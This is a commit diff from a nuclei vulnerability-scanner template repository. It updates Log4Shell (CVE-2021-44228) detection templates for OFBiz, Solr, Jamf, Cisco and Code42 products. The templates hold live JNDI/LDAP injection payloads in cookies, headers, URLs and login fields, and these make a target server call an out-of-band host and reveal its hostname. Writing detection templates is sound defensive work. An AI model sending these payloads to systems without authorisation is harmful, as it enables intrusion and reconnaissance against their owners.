Merge pull request #7170 from projectdiscovery/update-log4j
Update All Existing Log4j Templatespatch-1
commit
9082cb7329
106
.new-additions
106
.new-additions
|
@ -1,51 +1,55 @@
|
||||||
file/keys/postman-api-key.yaml
|
cves/2017/CVE-2017-16894.yaml
|
||||||
headless/technologies/sap-spartacus.yaml
|
cves/2020/CVE-2020-10199.yaml
|
||||||
http/cves/2017/CVE-2017-17731.yaml
|
cves/2021/CVE-2021-25078.yaml
|
||||||
http/cves/2020/CVE-2020-27481.yaml
|
cves/2021/CVE-2021-35250.yaml
|
||||||
http/cves/2021/CVE-2021-27314.yaml
|
cves/2022/CVE-2022-0747.yaml
|
||||||
http/cves/2021/CVE-2021-27315.yaml
|
cves/2022/CVE-2022-0769.yaml
|
||||||
http/cves/2021/CVE-2021-27316.yaml
|
cves/2022/CVE-2022-0773.yaml
|
||||||
http/cves/2021/CVE-2021-27319.yaml
|
cves/2022/CVE-2022-0846.yaml
|
||||||
http/cves/2021/CVE-2021-27320.yaml
|
cves/2022/CVE-2022-0864.yaml
|
||||||
http/cves/2021/CVE-2021-30175.yaml
|
cves/2022/CVE-2022-1903.yaml
|
||||||
http/cves/2021/CVE-2021-44228.yaml
|
cves/2022/CVE-2022-2219.yaml
|
||||||
http/cves/2022/CVE-2022-24264.yaml
|
cves/2022/CVE-2022-24223.yaml
|
||||||
http/cves/2022/CVE-2022-24265.yaml
|
cves/2022/CVE-2022-25485.yaml
|
||||||
http/cves/2022/CVE-2022-24266.yaml
|
cves/2022/CVE-2022-25486.yaml
|
||||||
http/cves/2022/CVE-2022-24716.yaml
|
cves/2022/CVE-2022-25487.yaml
|
||||||
http/cves/2022/CVE-2022-27984.yaml
|
cves/2022/CVE-2022-25488.yaml
|
||||||
http/cves/2022/CVE-2022-27985.yaml
|
cves/2022/CVE-2022-25489.yaml
|
||||||
http/cves/2022/CVE-2022-3980.yaml
|
cves/2022/CVE-2022-25497.yaml
|
||||||
http/cves/2022/CVE-2022-42095.yaml
|
cves/2022/CVE-2022-27926.yaml
|
||||||
http/cves/2022/CVE-2022-42096.yaml
|
cves/2022/CVE-2022-28032.yaml
|
||||||
http/cves/2022/CVE-2022-4328.yaml
|
cves/2022/CVE-2022-3062.yaml
|
||||||
http/cves/2022/CVE-2022-45037.yaml
|
cves/2022/CVE-2022-37190.yaml
|
||||||
http/cves/2022/CVE-2022-45038.yaml
|
cves/2022/CVE-2022-37191.yaml
|
||||||
http/cves/2022/CVE-2022-46020.yaml
|
cves/2022/CVE-2022-38295.yaml
|
||||||
http/cves/2023/CVE-2023-1020.yaml
|
cves/2022/CVE-2022-38296.yaml
|
||||||
http/cves/2023/CVE-2023-1671.yaml
|
cves/2022/CVE-2022-38467.yaml
|
||||||
http/cves/2023/CVE-2023-20864.yaml
|
cves/2022/CVE-2022-41441.yaml
|
||||||
http/cves/2023/CVE-2023-25135.yaml
|
cves/2022/CVE-2022-42094.yaml
|
||||||
http/cves/2023/CVE-2023-26360.yaml
|
cves/2022/CVE-2022-4321.yaml
|
||||||
http/cves/2023/CVE-2023-27350.yaml
|
cves/2023/CVE-2023-0099.yaml
|
||||||
http/cves/2023/CVE-2023-27524.yaml
|
cves/2023/CVE-2023-22620.yaml
|
||||||
http/cves/2023/CVE-2023-29489.yaml
|
cves/2023/CVE-2023-22897.yaml
|
||||||
http/cves/2023/CVE-2023-29922.yaml
|
cves/2023/CVE-2023-27008.yaml
|
||||||
http/cves/2023/CVE-2023-30210.yaml
|
cves/2023/CVE-2023-27159.yaml
|
||||||
http/cves/2023/CVE-2023-30212.yaml
|
cves/2023/CVE-2023-27179.yaml
|
||||||
http/cves/2023/CVE-2023-31059.yaml
|
cves/2023/CVE-2023-29084.yaml
|
||||||
http/cves/2023/CVE-2023-32235.yaml
|
default-logins/trassir/trassir-default-login.yaml
|
||||||
http/default-logins/powerjob-default-login.yaml
|
exposed-panels/appwrite-panel.yaml
|
||||||
http/default-logins/umami/umami-default-login.yaml
|
exposed-panels/aspect-control-panel.yaml
|
||||||
http/exposed-panels/oracle-opera-login.yaml
|
exposures/logs/yii-error-page.yaml
|
||||||
http/exposed-panels/papercut-ng-panel.yaml
|
misconfiguration/apollo-adminservice-unauth.yaml
|
||||||
http/exposed-panels/proxmox-panel.yaml
|
misconfiguration/default-spx-key.yaml
|
||||||
http/exposed-panels/red-lion-panel.yaml
|
misconfiguration/sql-server-report-viewer.yaml
|
||||||
http/exposed-panels/sophos-web-appliance.yaml
|
misconfiguration/thinkphp-errors.yaml
|
||||||
http/exposures/tokens/postman/postman-key.yaml
|
network/detection/msmq-detect.yaml
|
||||||
http/misconfiguration/apache/apache-zeppelin-unauth.yaml
|
network/enumeration/beanstalk-service.yaml
|
||||||
http/osint/mail-archive.yaml
|
osint/hashnode.yaml
|
||||||
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
|
osint/imgbb.yaml
|
||||||
http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml
|
osint/rubygems.yaml
|
||||||
http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
|
technologies/default-apache-shiro.yaml
|
||||||
http/vulnerabilities/wordpress/wpml-xss.yaml
|
technologies/switch-protocol.yaml
|
||||||
|
vulnerabilities/generic/cache-poisoning-xss.yaml
|
||||||
|
vulnerabilities/huawei/huawei-firewall-lfi.yaml
|
||||||
|
vulnerabilities/others/universal-media-xss.yaml
|
||||||
|
vulnerabilities/wordpress/ldap-wp-login-xss.yaml
|
||||||
|
|
|
@ -55,19 +55,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 2
|
group: 2
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/02/28
|
# Enhanced by mp on 2022/02/28
|
||||||
|
|
|
@ -22,12 +22,16 @@ info:
|
||||||
shodan-query: http.html:"Apache OFBiz"
|
shodan-query: http.html:"Apache OFBiz"
|
||||||
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
|
tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /webtools/control/main HTTP/1.1
|
GET /webtools/control/main HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
|
Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -39,13 +43,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/27
|
# Enhanced by mp on 2022/05/27
|
||||||
|
|
|
@ -24,11 +24,15 @@ info:
|
||||||
shodan-query: http.html:"Apache Solr"
|
shodan-query: http.html:"Apache Solr"
|
||||||
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
|
tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
@timeout: 25s
|
@timeout: 25s
|
||||||
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1
|
GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
attack: clusterbomb
|
attack: clusterbomb
|
||||||
|
@ -52,10 +56,21 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
regex:
|
regex:
|
||||||
- '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
|
@ -23,6 +23,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
|
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -32,7 +36,7 @@ http:
|
||||||
Referer: {{RootURL}}
|
Referer: {{RootURL}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
|
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -41,21 +45,31 @@ http:
|
||||||
words:
|
words:
|
||||||
- "dns"
|
- "dns"
|
||||||
|
|
||||||
- type: regex
|
|
||||||
part: interactsh_request
|
|
||||||
regex:
|
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<title>Jamf Pro Login</title>"
|
- "<title>Jamf Pro Login</title>"
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/27
|
# Enhanced by mp on 2022/05/27
|
||||||
|
|
|
@ -22,13 +22,17 @@ info:
|
||||||
shodan-query: title:"CloudCenter Suite"
|
shodan-query: title:"CloudCenter Suite"
|
||||||
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
|
tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
@timeout: 10s
|
@timeout: 10s
|
||||||
POST /suite-auth/login HTTP/1.1
|
POST /suite-auth/login HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
|
Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
|
||||||
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
|
{"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
|
||||||
|
@ -43,7 +47,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
@ -55,10 +59,16 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2023/03/22
|
# Enhanced by md on 2023/03/22
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
|
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -29,7 +33,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}/ccmadmin/showHome.do
|
Referer: {{BaseURL}}/ccmadmin/showHome.do
|
||||||
|
|
||||||
appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
|
appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -41,17 +45,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: kval
|
- type: kval
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2022/10/04
|
# Enhanced by md on 2022/10/04
|
||||||
|
|
|
@ -20,6 +20,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
|
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -30,7 +34,7 @@ http:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In
|
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -42,7 +46,7 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
@ -54,10 +58,16 @@ http:
|
||||||
kval:
|
kval:
|
||||||
- interactsh_ip # Print remote interaction IP in output
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by CS 03/27/2023
|
# Enhanced by CS 03/27/2023
|
||||||
|
|
|
@ -24,10 +24,14 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
|
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -39,13 +43,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by mp on 2022/05/27
|
# Enhanced by mp on 2022/05/27
|
||||||
|
|
|
@ -22,6 +22,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
||||||
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
|
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: '{{rand_int(111, 999)}}'
|
||||||
|
rand2: '{{rand_int(111, 999)}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
|
@ -31,7 +35,7 @@ http:
|
||||||
Referer: {{RootURL}}
|
Referer: {{RootURL}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
|
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -48,13 +52,23 @@ http:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- interactsh_ip # Print remote interaction IP in output
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
part: interactsh_request
|
||||||
|
group: 2
|
||||||
|
regex:
|
||||||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||||
|
|
||||||
# Enhanced by md on 2023/03/23
|
# Enhanced by md on 2023/03/23
|
||||||
|
|
|
@ -23,6 +23,10 @@ info:
|
||||||
verified: "true"
|
verified: "true"
|
